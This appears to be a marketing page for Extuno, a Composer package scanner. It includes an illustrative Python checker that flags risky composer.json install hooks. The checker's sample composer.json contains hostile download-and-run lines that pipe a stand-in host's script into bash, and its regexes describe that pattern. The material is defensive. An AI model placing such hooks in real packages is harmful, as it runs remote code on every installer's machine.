Package registry: Composer
Composer packages, checked on every release.
A poisoned Composer release can run code from a composer.json install hook, before any class is required. Extuno diffs each version and reads the PHP for install-script RCE, backdoors, and webshells - with static and AI analysis on every scan.
Composer - live inspection (demo widget: inspecting the monolog/monolog 3.9 -> 3.10 composer package update with static, dynamic and AI analysis)
What Extuno catches in Composer
Evidence, not guesswork.
Each finding names the change, why it is dangerous, and the recommended action.
- Diff finding: Install-script RCE (Critical). A composer.json post-install hook runs curl|bash on `composer install`.
- Diff finding: Injected webshell (Critical). A file gains eval() over request data - a remote-controlled shell.
- Diff finding: Remote code loader (Review). The package fetches a URL and eval()s the response.
See it on a poisoned update
Install-time PHP, caught before composer runs it
Extuno reads the composer.json hooks and the PHP, and flags the download-and-run install command.
- Vulnerability and secret-leak testing on every version
- Static analysis reads the package without running it
- Dynamic sandbox runs it live and records behavior
- AI code analysis reads the full source and correlates the change against prior versions
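As an added illustration of the composer.json hook check described above (example code, not Extuno's own), here is a small Python checker that walks the `scripts` section, flags download-and-run shell commands in hooks that fire automatically on install, and marks PHP callbacks in those hooks for manual review. The package name, domains and commands in the sample are constructed.

```python
import json
import re

# Composer "scripts" events that fire on their own during install, update or
# autoload dump, i.e. before any class in the package is ever required.
AUTO_HOOKS = frozenset({
    "pre-install-cmd", "post-install-cmd", "pre-update-cmd", "post-update-cmd",
    "pre-autoload-dump", "post-autoload-dump", "pre-package-install",
    "post-package-install", "pre-package-update", "post-package-update",
})
# A downloader piped into an interpreter: curl ... | bash, wget -qO- ... | sh, ... | php
PIPE_DOWNLOAD = re.compile(r"\b(?:curl|wget)\b[^|]*\|\s*(?:sudo\s+)?(?:(?:ba|z|da)?sh|php)\b", re.I)
# A downloader inside command substitution: bash -c "$(curl ...)" or `wget ...`
SUBST_DOWNLOAD = re.compile(r"(?:\$\(|`)\s*(?:curl|wget)\b", re.I)
# A static PHP callback (Vendor\Class::method); the shell check cannot see inside it
PHP_CALLBACK = re.compile(r"^[A-Za-z_\\][\w\\]*::\w+$")


def flag_install_hooks(composer_json: str) -> list[dict]:
    """Return one finding per risky command in a composer.json 'scripts' section."""
    scripts = json.loads(composer_json).get("scripts", {})
    findings = []
    for hook, entry in scripts.items():
        auto = hook in AUTO_HOOKS
        for cmd in entry if isinstance(entry, list) else [entry]:
            if cmd.startswith("@") and not cmd.startswith("@php "):
                continue  # alias of another script key; checked under that key
            if PIPE_DOWNLOAD.search(cmd) or SUBST_DOWNLOAD.search(cmd):
                findings.append({"hook": hook, "command": cmd, "reason": "download-and-run",
                                 "severity": "critical" if auto else "medium"})
            elif auto and PHP_CALLBACK.match(cmd):
                findings.append({"hook": hook, "command": cmd, "severity": "review",
                                 "reason": "PHP callback runs at install; read its source"})
    return findings


# Constructed composer.json for a hypothetical package (not a real Packagist release).
SAMPLE = json.dumps({
    "name": "acme/logger-helper",
    "scripts": {
        "post-install-cmd": ["@php -r \"echo 'installed';\"",
                             "curl -fsSL https://packagist-cdn.example/setup.sh | bash"],
        "post-update-cmd": "Acme\\Installer::run",
        "lint": "wget -qO- https://packagist-cdn.example/lint.sh | sh",
        "test": "phpunit",
    },
})

if __name__ == "__main__":
    for f in flag_install_hooks(SAMPLE):
        print(f"[{f['severity']}] {f['hook']}: {f['command']}  ({f['reason']})")
```

The `lint` entry is rated lower only because it does not run on `composer install`; a PHP callback in an automatic hook is where the static and AI PHP review has to take over.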
Demo dependency tree: your-app depends on monolog/monolog 3.10, guzzlehttp/guzzle 7.9, symfony/console 7.1 and acme/logger-helper 1.2.1, whose post-install-cmd hook reaches out to packagist-cdn.co.
Scan your first Composer package free.
Your first 5 credits are free - that is 5 full scans, no card required.